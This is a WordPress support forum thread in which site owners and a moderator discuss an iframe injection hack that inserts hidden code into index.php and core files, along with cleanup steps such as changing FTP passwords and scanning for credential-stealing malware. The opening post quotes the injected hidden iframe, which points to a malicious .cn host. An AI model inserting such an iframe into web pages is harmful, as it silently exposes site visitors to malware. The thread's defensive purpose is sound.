• Hello –

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specfic hack code is:
    <iframe src="https://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    • Gauge how often it’s happening
    • Share solutions
    • Expose the culprits, if possible
    • Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advise, and I plan to sweep my machine and those of other team members with FTP access (could be virus attached to our systems), check recent plugins, scan for virus’ on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do same.

    Here are the other useful threads I have found:

    – Scott

Viewing 15 replies - 1 through 15 (of 38 total)
  • Thread Starter WebFadds

    (@webfadds)

    Hello –

    UPDATE: I have had this problem now on abou 5 sites in the last week, and also discovered iframe insertion hack in the default-filters.php file in the wp-includes file.

    All team members have swept their own PCs and not found anything related.

    We are proceeding to sweep hosting servers and change FTP passwords.

    – Scott

    Thread Starter WebFadds

    (@webfadds)

    Hello –

    Good news all… one of our colleagues in the battle has programmed a new plugin, which specifically scans and checks for iframes:
    https://www.ads-software.com/extend/plugins/antivirus/ – released 6/18

    I am using it and will report here. Your experiences and reports will help too.

    – Scott

    definitely a FTP password hack.

    I think most people who were hacked had Adobe Reader 8.0 and using FileZilla

    Thread Starter WebFadds

    (@webfadds)

    Hi Gariben –

    I have FileZilla, but was not using it. Was using Fetch (a Mac based FTP program). Why do you think Adobe Reader 8.0 was involved?

    UPDATE: After cleaning the index.php files on the infected systems, changing passwords, and installing the antivirus plugin reported above, have had no more incidents of the attack.

    – Scott

    I had the same issue just today and have just removed all the iframe stuff from my index.phh files and also on the default-filters.php. Site is back up now, but I have a question concerning one of the index files. On wp-content/themes there is a index.php and the only thing it says (after removing the iframe line) is “Silence is golden”. Now I suspect that is a practical joke of whoever comes up with this stuff, but just to be sure… can I delete the entire index.php with that line in it?

    O and btw; I use Cyberduck…

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.ads-software.com Admin

    The semi-empty index.php is there to prevent people from seeing what’s in your theme directory. A blank index.php works just as well, but if you remove it, it might cause a security issue.

    In other words, the “Silence” part is official. It’s what’s there in WordPress too. ??

    Thanks Otto! See that is something I didn’t know… Good thing I didn’t remove it then…
    What I did notice is that I all of a sudden have the letters ‘f’ on top of my weblog… How did it get there and how do I remove it? Not sure where to look and I’m also not sure if this is related to the problem with the index….

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.ads-software.com Admin

    The f is probably just some text somewhere at the bottom of a file. Look in the theme files, as well as any files you may have edited recently.

    My site is hacked again but I can’t seem to be able to solve it!! I’ve changed all the index.php files and a couple of others as well. The only thing I can see is that there seems to be an index.html file that is also changed. I don’t know how to read or change html and am also not sure if that is causing the issue, but it is driving me insane!! Hope someone can help me out here on what to do!

    you MUST change your ftp password, junglefrog

    and as for editing .html files — you can edit that in a plain text editor.

    If someone could break into your site via FTP why would they make such minor changes when they could run roughshod and change things all over the place. I don’t buy the FTP explanation.

    This type of FTP hack is quite common these days. In almost every case it is an infected PC (with malware) that collects FTP u/p information from FTP programs on the PC. This data is transmitted to the hacker network, that then runs bots to insert iframe malicious code in index* pages, .htaccess, main* pages, etc… all automatically.

    Run a full a/v scan, and then download and run malwarebytes.org software once it’s updated on any PC that might have your FTP u/p stored in an FTP program (including designers, developers, SEO, outsource companies, etc…)

    I have changed all my passwords, added antivirus protection and well, it still happened. I changed everything again. It is fixed now; apparently there was also something changed in a configuration file. But it’s sorted. I have a mac and not a pc.
    Other then myself no one has the passwords… Fingers crossed..

    I have a mac …

    interesting. Ive cleaned up about 15 sites now where the primary user was on a mac.

    I am also facing the same problem from past one week.I found iframe code in many files like index.php,default-filters.php.I removed and reimstalled WP and still the problem is there.I have aslo installed antivirus plugin but still have problems.Any permanent solution to this problem.Any help would be highly appreciated.

Viewing 15 replies - 1 through 15 (of 38 total)
  • The topic ‘iFrame Hack on Several WP Sites’ is closed to new replies.